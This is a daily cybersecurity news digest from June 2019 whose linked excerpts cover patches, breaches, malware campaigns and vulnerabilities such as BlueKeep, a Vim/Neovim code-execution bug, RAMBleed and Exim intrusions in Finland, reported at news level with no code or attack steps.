Daily NCSC-FI news followup 2019-06-11

Wi-Fi in the office convenient but risky

www.kaspersky.com/blog/vulnerable-wi-fi/27250/ Almost every office has a Wi-Fi network today, and sometimes more than one. Who wants to connect laptops with a cable? And forget about smartphones and tablets! However, a wireless network can be a weak point in your IT infrastructure. Not all companies use complex and unique passwords for their wireless networks, and few bother to disable the broadcasting of the networks name. And not many at all limit the power of the WI-Fi signal to prevent network connections from outside of the office. Thus, usually little prevents a potential attacker from hanging around near the office and trying to get into a corporate network through a Wi-Fi connection.

Hunting COM Objects (Part Two)

www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html As a follow up to Part One in this blog series on COM object hunting, this post will talk about taking the COM object hunting methodology deeper by looking at interesting COM object methods exposed in properties and sub-properties of COM objects.

Equifax is still paying for its data breach: $1.4 billion and counting

www.pandasecurity.com/mediacenter/news/equifax-rating-lowered/ In September 2017, the credit score company Equifax announced that it had become the victim of one of the largest data breaches of all times. Although it wasnt the largest that dubious honor goes to Yahoo, which lost details of around 3 billion accounts in 2013 the Equifax data breach saw the data of around 145 million US consumers exposed, along with those of millions of people from other countries.

Mircosoft June 2019 Security Updates

portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/253dc509-9a5b-e911-a98e-000d3a33c573 Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.. Also:

thehackernews.com/2019/06/windows-june-updates.html. Also:

isc.sans.edu/forums/diary/MSFT+June+2019+Patch+Tuesday/25024/

CYBER ACTORS EXPLOIT ‘SECURE’ WEBSITES IN PHISHING CAMPAIGNS

www.ic3.gov/media/2019/190610.aspx Websites with addresses that start with https are supposed to provide privacy and security to visitors. After all, the s stands for secure in HTTPS: Hypertext Transfer Protocol Secure. In fact, cyber security training has focused on encouraging people to look for the lock icon that appears in the web browser address bar on these secure sites. The presence of https and the lock icon are supposed to indicate the web traffic is encrypted a

Adobe Issues Critical Patches for ColdFusion, Flash Player, Campaign

thehackernews.com/2019/06/adobe-patch-june.html It’s Patch Tuesday week!. Adobe has just released the latest June 2019 software updates to address a total 11 security vulnerabilities in its three widely-used products Adobe ColdFusion, Flash Player, and Adobe Campaign. Out of these, three vulnerabilities affect Adobe ColdFusion, a commercial rapid web application development platformall critical in severitythat could lead to arbitrary code execution attacks.

How Ursnif Evolves to Keep Threatening Italy

blog.yoroi.company/research/how-ursnif-evolves-to-keep-threatening-italy/ For months the Italian users have been targeted by waves of malspam delivering infamous Ursnif variants. Yoroi-Cybaze ZLab closely observed these campaigns and analyzed them to track the evolution of the techniques and the underlined infection chain, noticing an increasing sophistication. For instance the latest waves increased their target selectivity abilities by implementing various country-checks and their anti-analysis capabilities through heavy code obfuscation.

Cyberattack exposes travelers photos, says US border agency

www.welivesecurity.com/2019/06/11/cyberattack-travelers-photos-usa-cbp/ The images, collected over one and a half months, were taken as the travelers crossed an unspecified border point. The United States Customs and Border Protection (CBP) has announced that a security incident at one of its subcontractors has compromised the photos of thousands of travelers entering and departing the country. In addition to the photos of the peoples faces, the stolen data also include images showing the license plates of the cars they used for entering and exiting the US. The data had been collected by CBP over a period of one and a half months as the travelers crossed an unspecified border point, according to The Washington Post, which broke the news.

Linux Command-Line Editors Vulnerable to High-Severity Bug

threatpost.com/linux-command-line-editors-high-severity-bug/145569/ A high-severity bug impacting two popular command-line text editing applications, Vim and Neovim, allow remote attackers to execute arbitrary OS commands. Security researcher Armin Razmjou warned that exploiting the bug is as easy as tricking a target into clicking on a specially crafted text file in either editor. Razmjou outlined his research and created a proof-of-concept (PoC) attack demonstrating how an adversary can compromise a Linux system via Vim or Neowim. He said Vim versions before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution.

‘RAMBleed’ Rowhammer attack can now steal data, not just alter it

www.zdnet.com/article/rambleed-rowhammer-attack-can-now-steal-data-not-just-alter-it A team of academics from the US, Austria, and Australia, has published new research today detailing yet another variation of the Rowhammer attack. The novelty in this new Rowhammer variety — which the research team has named RAMBleed — is that it can be used to steal information from a targeted device, as opposed to altering existing data or to elevate an attacker’s privileges, like all previous Rowhammer attacks, have done in the past.

Sähköisten äänestyslaitteiden valmistaja ei usko itsekään koneidensa turvallisuuteen

www.tivi.fi/uutiset/tv/ad7b686d-448c-4f9d-a2f0-06c074f5969b Äänestyskoneita valmistava Election Systems & Software on tehnyt päätöksen lopettaa paperittomien äänestyskoneiden myynti ensisijaisina äänestysvälineinä, uutisoi TechCrunch. Yhtiön toimitusjohtaja Tom Burt selittää päätöstä sillä, että äänestyksessä on hyvä olla paperinen rekisteri virheiden ja väärinkäytön varalta.

Suomessa tietomurtoaalto: hyökkääjät tunkeutuvat sähköpostipalvelimen kautta

www.tivi.fi/uutiset/tv/584c6521-3034-41e7-a767-612e3dc9cce5 Kyberturvallisuuskeskus varoittaa Exim-sähköpostipalvelimen haavoittuvuudesta, joka mahdollistaa komentojen suorittamisen järjestelmässä. Keskus kertoo saaneensa Suomesta useita ilmoituksia tietomurroista, joissa tietojärjestelmiin on tunkeuduttu Exim-sähköpostipalvelimen haavoittuvuuden kautta. Haavoittuvuutta hyödynnetään aktiivisesti myös muualla maailmassa.

Finding Windows Systems Affected by BlueKeep Remote Desktop Bug

www.bleepingcomputer.com/news/security/finding-windows-systems-affected-by-bluekeep-remote-desktop-bug/ On last month’s Patch Tuesday, Microsoft announced that a vulnerability in Remote Desktop Services was discovered that could allow a wormable malware, such as a ransomware, to easily propogate through vulnerable systems. This vulnerability, now known as BlueKeep, was given the unique ID of CVE-2019-0708 and affects Windows 7, Windows 2008 R2, Windows Server 2008, Windows XP, and Windows Server 2003. Due to its severity, Microsoft released patches for all supported versions of Windows as well as for Windows XP and Windows Server 2003, which no longer received security updates.

New Spam Campaign Controlled by Attackers via DNS TXT Records

www.bleepingcomputer.com/news/security/new-spam-campaign-controlled-by-attackers-via-dns-txt-records/ A new finance spam campaign with HTML attachments has been discovered that utilizes Google’s public DNS resolver to retrieve JavaScript commands embedded in a domain’s TXT record. These commands will then redirect a user’s browser to a aggressive trading advertisement site, which has been reported as a scam. According to MyOnlineSecurity.com, who discovered this campaign, it is being targeted at people in the United Kingdom and the associated IP addresses have previously been utilized by the Necurs botnet.

FIN8 hackers return after two years with attacks against hospitality sector

www.zdnet.com/article/fin8-hackers-return-after-two-years-with-attacks-against-hospitality-sector/ Two years after the last report on the activities of the FIN8 hacking group, security researchers say they’ve spotted the elusive hackers attempting new attacks against companies in the hospitality sector. FIN8, as its “FIN” codename indicates, is a group of hackers focused on attacks for their own financial benefit, as opposed to APT (advanced persistent threat) groups that are focused on intelligence gathering and cyber-espionage.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.